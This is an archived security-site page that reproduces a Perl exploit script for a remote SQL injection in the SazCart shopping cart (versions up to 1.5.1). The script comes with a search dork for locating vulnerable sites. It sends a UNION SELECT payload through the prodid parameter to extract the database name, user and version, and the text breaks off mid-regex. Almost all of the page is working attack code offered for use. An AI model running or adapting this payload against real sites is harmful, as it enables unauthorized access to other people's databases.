TUCoPS :: Web :: e-commerce, shopping carts :: bx3122.htm

SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit
SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit
SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit


#!/usr/bin/perl=0D
=0D
# SazCart <= v1.5.1 (details&prodid) Remote SQL Injection Exploit=0D
# HomePage: http://www.sazcart.com=0D 
# Discovered & Coded by JosS=0D
# Contact: sys-project[at]hotmail.com=0D
# Spanish Hackers Team / Sys - Project / EspSeC=0D
# http://www.spanish-hackers.com=0D 
# rgod forever :D=0D
=0D
# Dork: "Powered by SazCart"=0D
=0D
=0D
print "\t\t########################################################\n\n";=0D
print "\t\t#   SazCart <= v1.5.1 - Remote SQL Injection Exploit   #\n\n";=0D
print "\t\t#                       by JosS                        #\n\n";=0D
print "\t\t########################################################\n\n";=0D
=0D
use strict;=0D
use LWP::UserAgent;=0D
=0D
my $victim = $ARGV[0];=0D
=0D
 if(!$ARGV[0]) {=0D
    print "\n[x] SazCart <= v1.5.1 - Remote SQL Injection Exploit\n";=0D
    print "[x] written by JosS - sys-project[at]hotmail.com\n";=0D
    print "[x] usage: perl xpl.pl [host]\n";=0D
print "[x] example: http://localhost/path/\n\n";=0D 
    exit(1);=0D
 }=0D
 =0D
    print "\n[+] Exploiting...\n";=0D
    my $cnx = LWP::UserAgent->new() or die;=0D
    my $go=$cnx->get($victim."?details&prodid=1'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4/*");=0D
    if ($go->content =~ m/Price<\/b>\:(.*?)\

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH